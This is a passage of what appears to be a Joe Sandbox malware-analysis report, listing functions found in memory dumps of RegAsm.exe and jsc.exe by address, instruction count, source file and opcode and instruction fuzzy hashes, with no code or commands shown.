Instruction Fuzzy Hash: 8FF0B239B40608CFCB14DBA8D598A6C77B2FF89625F5044A8E5069B3A4CB35AD42DB40

Function 011E8100 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9914aff41fd2f40849199772888283dc72f123706861921b77a8bd9842005de5
Instruction ID: 9d90d64ae0bba2fe24d58dc07a572d30ae2a58db0391da7cc93accc24f7e9a3a
Opcode Fuzzy Hash: 9914aff41fd2f40849199772888283dc72f123706861921b77a8bd9842005de5
Instruction Fuzzy Hash: 16F0313491014EEFEF45FFA8F95159D7BB1EF80300F50966CC104AB295EE752E058B91

Analysis Process: jsc.exePID: 572, Parent PID: 1808COMMON

Executed Functions

Function 0301CE8E Relevance: 2.2, Instructions: 2211COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 662e77a16002b5869540c02c9ccc5bf40dec449b6c4242ac6013d71e79b11c05
Instruction ID: d1fb11481963d2a10a58aa24d89149f35e005de077317801aed4d63c141bafa1
Opcode Fuzzy Hash: 662e77a16002b5869540c02c9ccc5bf40dec449b6c4242ac6013d71e79b11c05
Instruction Fuzzy Hash: 5D230E31D1071A8EDB11EF68C8806ADF7B1FF99300F15C79AE458A7215EB70AAD5CB81

Function 03014A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6bfe2860bd363588b3029c3152a5d018ac9a6221eb5b45c913c30933b72803d
Instruction ID: 4a53ceae6238d0b9df304295584b2becbeac6b450d9724ed07427cddb9db9460
Opcode Fuzzy Hash: d6bfe2860bd363588b3029c3152a5d018ac9a6221eb5b45c913c30933b72803d
Instruction Fuzzy Hash: 86B16F70E01209CFDF50CFAAC88179EFBF2AF88714F198529D815EB264EB749855CB81

Function 03013E80 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4210457f334aa45bd388db52efce72e455a9053f2a47b6909ab352e8fd866873
Instruction ID: 01b4ddfa99ec897fcd5727cdb15080552a31a4eb12b583fb94de160e692838f7
Opcode Fuzzy Hash: 4210457f334aa45bd388db52efce72e455a9053f2a47b6909ab352e8fd866873
Instruction Fuzzy Hash: B8917A70E01209DFDF50CFAAC98579EBBF2BF88714F188129E415AB264EB749855CB81

Function 0301790A Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e79a2161ae82b87490fb1b2bb4c588279f7498c5b35537591c7508901f3cfa
Instruction ID: 1beec3fd8684153bbe8e003a92d908e737d9db15438921ad477983329ea3a3d3
Opcode Fuzzy Hash: 72e79a2161ae82b87490fb1b2bb4c588279f7498c5b35537591c7508901f3cfa
Instruction Fuzzy Hash: 53126E30710206DBDB2AEB38E89426936E6FFC5345B644A7DE006DB350CF79DC46AB91

Function 03019364 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b6e07b923deadac24e1191a547ce1332d721e10a5032dd34bfacdbdba5c9cc4
Instruction ID: 9228c7485bd86dc9ed882997d732f0b2502474fbd94c6132b27575eeec9adb66
Opcode Fuzzy Hash: 6b6e07b923deadac24e1191a547ce1332d721e10a5032dd34bfacdbdba5c9cc4
Instruction Fuzzy Hash: C7D17B74B112058FDB54DF68D494AAEBBF6FF88210F248869E406EB391DB74EC51CB90

Function 030196E0 Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51dfc1a1f7e18b9c850907600ac925b80dc5f1dd5aa3dd83778fe5392d990a72
Instruction ID: bdb821dd9938d415b3303e0734551f983e93440c80415266e1dc23874fa450f6
Opcode Fuzzy Hash: 51dfc1a1f7e18b9c850907600ac925b80dc5f1dd5aa3dd83778fe5392d990a72
Instruction Fuzzy Hash: 36C1BC71A012058FDB54CFA8D8907AEB7F6FF88310F248569E909EB391DB74D855CB90

Function 03014A8C Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3420f52778c27f29f1047fb15476daf963e48666fb44d45f308571008022687
Instruction ID: 9e810ead4499c32aa81deca48b3627279e82a57a9dda1d779608cd9999a219e9
Opcode Fuzzy Hash: c3420f52778c27f29f1047fb15476daf963e48666fb44d45f308571008022687
Instruction Fuzzy Hash: 83A15E70E01219CFDF50CFAAC8857DEBBF1AF48714F188529D815EB264EB749855CB81

Function 03013E74 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749c5c81edd4ba94528f121812d8cf51e28387516b613f0d674bd38f77959edc
Instruction ID: e369e717fc22f7ee3c73acc465face2e73d3ff20ee4cb02006edd70bfdf3bf0d
Opcode Fuzzy Hash: 749c5c81edd4ba94528f121812d8cf51e28387516b613f0d674bd38f77959edc
Instruction Fuzzy Hash: FA915C70E01209DFDF50CFAAC9857DEBBF2BF88714F188129E415AB254EB749855CB81

Function 03014810 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 033dc9ccc5ec1473af66b7e9cecdf1a079182bea2ffce8083ad5180007b1ae9b
Instruction ID: aa48d60928483b30c1fcb4602f55c499c31c5e8304ba1e70b40098ecd182d6c3
Opcode Fuzzy Hash: 033dc9ccc5ec1473af66b7e9cecdf1a079182bea2ffce8083ad5180007b1ae9b
Instruction Fuzzy Hash: DD717C70E01349DFDB54CFAAC88579EFBF2BF88714F188129E414AB264EB749851CB91

Function 03014804 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf31f36859e141e1e805b18ab43e28db015fc24827f0aa27a0b8dd58b24b40da
Instruction ID: a3c9712fa81bb7e87e99428ee652012c9d4d7a0d4c1b90552c2b50a06a7f61dc
Opcode Fuzzy Hash: bf31f36859e141e1e805b18ab43e28db015fc24827f0aa27a0b8dd58b24b40da
Instruction Fuzzy Hash: F7716BB0E01249DFDB50CFAAC9857DEFBF1BF88714F188129E414AB264DB749851CB91

Function 03016ED7 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a711864a2c87db68caae290effbb94bc108869fa430ad6bf10a1158303f0b434
Instruction ID: bf4b9f0c25e97b55756ffc5484bd0557b8f12db5006bb98113268b3354e8df63
Opcode Fuzzy Hash: a711864a2c87db68caae290effbb94bc108869fa430ad6bf10a1158303f0b434
Instruction Fuzzy Hash: FD51F330A01209DFDB25DF68D8547AEB7F6FF85300F24856AE802EB280DB76D856CB51

Function 03016CDD Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ab7863ca0df18ad0046c488f5ea6f56262791a00748ffb904338bbda11c8ba
Instruction ID: 6ff6d52ec9fa871bbe49bc36f99e35f9f7116e6830a62a8ed0c4afe6d1c2e604
Opcode Fuzzy Hash: 37ab7863ca0df18ad0046c488f5ea6f56262791a00748ffb904338bbda11c8ba
Instruction Fuzzy Hash: 675121B5D012188FDB18CFA9C888BADFBF1BF48300F19852AE815BB350D775A844CB91

Function 03016CE8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3d0931c1342e155a30dd2fdb83c7cc0264f530b7d486dee7fe1fc5a53b19d90
Instruction ID: c2cd65f2a8103024daf5c02ffd3c35934b82b547446f494a1fba86f7046f1599
Opcode Fuzzy Hash: d3d0931c1342e155a30dd2fdb83c7cc0264f530b7d486dee7fe1fc5a53b19d90
Instruction Fuzzy Hash: 77511371D012188FDB28CFA9C884B9EFBF5BF48310F18851AE815BB350DB75A844CB95

Function 0301112A Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bcbf8b0564953bda976459cda78d35ed035e40c8636059438e386cca49824bc
Instruction ID: 9120f22044046cc936b71559e7ebba57517a95f431d4ac27c12e3fe2a01b1938
Opcode Fuzzy Hash: 9bcbf8b0564953bda976459cda78d35ed035e40c8636059438e386cca49824bc
Instruction Fuzzy Hash: 5751C9B9305242CFD719EF28FA80A483FB5EBD1346700A2BDE1047B666DA7C6D45CB81

Function 0301F2CD Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aebd9decef36f8c81b33936ceb4eba47bec759443993e3f09cb5b75de9e61546
Instruction ID: 566fc54cd94baf8e30234ad60a0a60acdcdecfc8ae25d69c056bbf6cf5e842ba
Opcode Fuzzy Hash: aebd9decef36f8c81b33936ceb4eba47bec759443993e3f09cb5b75de9e61546
Instruction Fuzzy Hash: AB31EE31B012068FDB599A38D4506AE7BFABF89240F684578D402EB385DE39DC52C794

Function 03011138 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 375b1d2125f4112a850ac3a7033b9b23f0723299963cfaa4befe07281ba09638
Instruction ID: d523e11392bbf6c255d455b853655ef4c664f26231342378f8c01285e670e9d7
Opcode Fuzzy Hash: 375b1d2125f4112a850ac3a7033b9b23f0723299963cfaa4befe07281ba09638
Instruction Fuzzy Hash: 1F5199B9315242CFC619EF28FA80A593FB5EBD1346700A5BDE1007B666EA7C6D05CB81

Function 0301F190 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f255f1b05dda2783c2811da9e1b5bc4c73a7fc3d9ba04824e03aec39385e71
Instruction ID: ef4e85b83893c57c6c1ccb3706e5c10def6031879714533dfd7d77c9a146d8fb
Opcode Fuzzy Hash: e8f255f1b05dda2783c2811da9e1b5bc4c73a7fc3d9ba04824e03aec39385e71
Instruction Fuzzy Hash: 38315D75E116069BCB55CFA8D894A9EB7F6BF89300F54C629E806E7350DB70E842CB50

Function 03016F78 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb65641e3e480d54d58373c35fbebd4459ff811f306027497beeeac5c09089f6
Instruction ID: fbe434b2371baceff2d9798fd4e2d4c82410b6cef7aecd35acad2266b585efdd
Opcode Fuzzy Hash: bb65641e3e480d54d58373c35fbebd4459ff811f306027497beeeac5c09089f6
Instruction Fuzzy Hash: 60317E30E11219CBDB15CFA4D844B9EB7B6FF85710F24856AE806FB240EB71E956CB90

Function 030126DE Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7240d052b8cab751f17bcfefa0cfcde16ed7a905fb64bce9cefcc05701ae796a
Instruction ID: 4bfa23561631ed8d9aa0da39f177453331ad10cb47c3c02442a98527f046409b
Opcode Fuzzy Hash: 7240d052b8cab751f17bcfefa0cfcde16ed7a905fb64bce9cefcc05701ae796a
Instruction Fuzzy Hash: 4D410EB1D01349DFDB10CFA9C980ADEBBF5FF48310F24842AE419AB254DB74A955CB90

Function 0301F1A0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ae6fca3c13b36bb8fefd44bc42f62aaa2ea28e5aee434d6361d5c31c189054a
Instruction ID: a44cb457d2250816d0b3f1f964d9806829fead2ea6d5c0449652982584ab795c
Opcode Fuzzy Hash: 4ae6fca3c13b36bb8fefd44bc42f62aaa2ea28e5aee434d6361d5c31c189054a
Instruction Fuzzy Hash: FE314B35A116069BCB59CFA8D494A9EB7F6BF89300F14CA29E806E7340DB70AC52CB50

Function 030126E8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3686cb3eb53f775705f36fd59877b143a7b15826261f0b3a5d2fc9b079ddda
Instruction ID: 683a56b19ec0d06da29101267b189722462ff03376e962bb6c817fe1fa5fedde
Opcode Fuzzy Hash: 0e3686cb3eb53f775705f36fd59877b143a7b15826261f0b3a5d2fc9b079ddda
Instruction Fuzzy Hash: 1E410EB1D0134DDFDB10CFA9C980A9EBBF5FF48310F248429E809AB254DB75A955CB90

Function 03019250 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cd594a3d5348dece301cc576da7af16e3be7b3ea40722bbb835481dd9b9510b
Instruction ID: d16410436dfc5f47a810792baf78e68808ae7282b4aa33a7f3757e55df0afa3f
Opcode Fuzzy Hash: 0cd594a3d5348dece301cc576da7af16e3be7b3ea40722bbb835481dd9b9510b
Instruction Fuzzy Hash: C2318D71E0120A9BDB45CFA8D4A469EF7B6FF89300F54C669E805FB340EB709856CB90

Function 03019260 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e989c1b93dacd522b34f95002fca02e5e7cefd1d7a6e827886a56fa236643ed5
Instruction ID: 3fa3f02dc26b07cba659fc68c69e8ed1fea743788d557ee819313a11fd9a5a40
Opcode Fuzzy Hash: e989c1b93dacd522b34f95002fca02e5e7cefd1d7a6e827886a56fa236643ed5
Instruction Fuzzy Hash: 35218D71E0120A9BDB55CFA8D494A9EF7B6FF89300F54C629E805EB240DB709852CB90

Function 03016BA1 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e35fa20438fe31ae9fb0cd96366f18552a4d2f8f48f7b268bbd94fb68b7a4275
Instruction ID: c039824bdd79ca8b7759e9d181eb82439a36e154a74711053b35a64e5d13fae1
Opcode Fuzzy Hash: e35fa20438fe31ae9fb0cd96366f18552a4d2f8f48f7b268bbd94fb68b7a4275
Instruction Fuzzy Hash: 1621F0726002455FD711AB7CE824B9E7BF6EFCA210B1548AAD106CB391EE7A8C468791

Function 0301169F Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd45ea3691d032cbd9c1bd703f80bf3f11b152fc47de02afdf8618324163460b
Instruction ID: 424c64aaa47f3e88e2c5aa13fb4ac66bb63e0e543318b211c93398d1977d0370
Opcode Fuzzy Hash: cd45ea3691d032cbd9c1bd703f80bf3f11b152fc47de02afdf8618324163460b
Instruction Fuzzy Hash: ED21D0783111018BEB18EB28F98475E3BAAEBC4314F1465B9E506DB341DB3CDC558B91

Function 03011382 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87d09e75d4ab5b8975784afa63b680e6fbe5dbf8eb1ca10bd73d9884265c45aa
Instruction ID: d5f03a06554afa9f93cdd77f6d5ff0b81d0ed4debb0edcff7816c9ca38aa3f9c
Opcode Fuzzy Hash: 87d09e75d4ab5b8975784afa63b680e6fbe5dbf8eb1ca10bd73d9884265c45aa
Instruction Fuzzy Hash: 9E2127706122054BDB7DE724F48936C3BE9E746315F1808AAF606C7B80DE6CCC98E741

Function 03011878 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c506d6273983450afb4bedf3d7d104d414af07c94b4c55bf6464244f593ed943
Instruction ID: 9b65e6e6855611ceac2d2253b1b484c343f643f19f92e27b4f335a7c691d60a1
Opcode Fuzzy Hash: c506d6273983450afb4bedf3d7d104d414af07c94b4c55bf6464244f593ed943
Instruction Fuzzy Hash: 1D21AE34B01205CFDF5CEB78C5146AE77F6AF89244F2444A8D206EB3A0EB369D10CBA1

Function 03014F8A Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9e7d8b2e3912841de1747f98bb5a4b33ecc587c0d493913e10405596247f7a6
Instruction ID: cb1a169a61346593a508de1b0854644935a46c0e5dbc0b64060a38d549cb442b
Opcode Fuzzy Hash: b9e7d8b2e3912841de1747f98bb5a4b33ecc587c0d493913e10405596247f7a6
Instruction Fuzzy Hash: F9212734700208CFCB58DBB8D958AAD77F6EB89301F1004A8E506EB3A4DB76DD51CB91

Function 0138D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3401615605.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_138d000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39d2c75d8c174f47204882022cf8fa4ab38d90581b085d7120166120ea689224
Instruction ID: 58cbfcd14cdc8a5682c5744103fa12ba9d16c65f417dbffe9969693a85e1eb03
Opcode Fuzzy Hash: 39d2c75d8c174f47204882022cf8fa4ab38d90581b085d7120166120ea689224
Instruction Fuzzy Hash: E12134B1504308EFDB15EF54D9C0B26BBA5FB84318F20C66DD90A4B296C37AD847CA62

Function 03019150 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d56f093e66e63d054de988d5eadd51522e431c015a084246e2f2538f2591183
Instruction ID: 696dcfe38ae02c6c09e7686fc95c770cd7e25f3dc5f255322dc6d4a74c5c4425
Opcode Fuzzy Hash: 6d56f093e66e63d054de988d5eadd51522e431c015a084246e2f2538f2591183
Instruction Fuzzy Hash: 7D21A175E012158BCB49CFA4D8546DEF7F6AF88300F54856AE816FB350DB709855CB90

Function 03019160 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eee84bb0cafaba330aaa28cb368118e3e0cb705e0f2db57f59c12711e972609
Instruction ID: f8e9d1a56412bfc611fef43d3547259c04d6fbc32183ada47acad54dae56ee11
Opcode Fuzzy Hash: 1eee84bb0cafaba330aaa28cb368118e3e0cb705e0f2db57f59c12711e972609
Instruction Fuzzy Hash: 57218030E012199BCB58CFA4D85459EF7B6AF89300F54852AE816FB340DB70A851CB90

Function 03011888 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c312a4d8718a9c447b510a67274221d50354b2b723baa2fc7cea0ce8b367b85
Instruction ID: 3655c0393f50f280467d1b31c19d2ec51177238789f61815f95c71b39045b5ab
Opcode Fuzzy Hash: 9c312a4d8718a9c447b510a67274221d50354b2b723baa2fc7cea0ce8b367b85
Instruction Fuzzy Hash: 75218C34B01209CFDB5CEB78C5146AE77F6AF89245F2004A8D202EB390EB36CD10CBA1

Function 030116B0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54b7c199956b7de7ed729bc0111baffd765f9e08f90dae58720595b74144f52
Instruction ID: 04f06a359c53be39461c83817ee62ca07f23027f2182c5c40fd56e1d1d95651d
Opcode Fuzzy Hash: c54b7c199956b7de7ed729bc0111baffd765f9e08f90dae58720595b74144f52
Instruction Fuzzy Hash: B721A1783111058BEB58EB28F98471E3BAAEBC4314F146979E506D7351DF7C9C548B81

Function 03014F98 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c5db8afdbc50438857d8b976ae64393fad66f684c7710db7fd1be0551f7ebf8
Instruction ID: f1b384cb558bacca53dc3937d12264b18ff254b6755ca002794c905f2ed21be9
Opcode Fuzzy Hash: 0c5db8afdbc50438857d8b976ae64393fad66f684c7710db7fd1be0551f7ebf8
Instruction Fuzzy Hash: E8210534B00204CFCB58DB78C958AAE77F6AB89305F1044A8E506EB3A4DB769D11CB91

Function 03010838 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9defa6d6315c1482e1bd95a5587803786597d5fece901b31b2ef78ee8fa73bc
Instruction ID: b017bbffb324e824af8b1f2a5f67f03db0dcd3ecfea4dd5e0279714e9251f641
Opcode Fuzzy Hash: a9defa6d6315c1482e1bd95a5587803786597d5fece901b31b2ef78ee8fa73bc
Instruction Fuzzy Hash: FC11E931B0630997EF64AA75D91037E3699E781314F2888B9D4C2CF281DAB9CCD54BD1

Function 03010848 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c25e5709dfec875a59e0cd6caa72076db3e3884f59924c82db160f0f1aeb333
Instruction ID: 40a29f08616a42c9a665d5c1f7a5a3c8212cb90590323e36a76a27af12912320
Opcode Fuzzy Hash: 0c25e5709dfec875a59e0cd6caa72076db3e3884f59924c82db160f0f1aeb333
Instruction Fuzzy Hash: 6B119430B062098BEF64EB79C50476D36A9FB85314F244879D1C6CF285DAB5CCD58BD1

Function 030117C2 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.3406604482.0000000003010000.00000040.00000800.00020000.00000000.sdmp, Offset: 03010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3010000_jsc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e33e8a3ffcc1263e01d10668c30b94cd3d00c11b4b045745d226c0591ab1c5ae
Instruction ID: f784ea2a7d711efacb6ba44d3171ca3a268040a0436c4d17436b10b29ba75dea
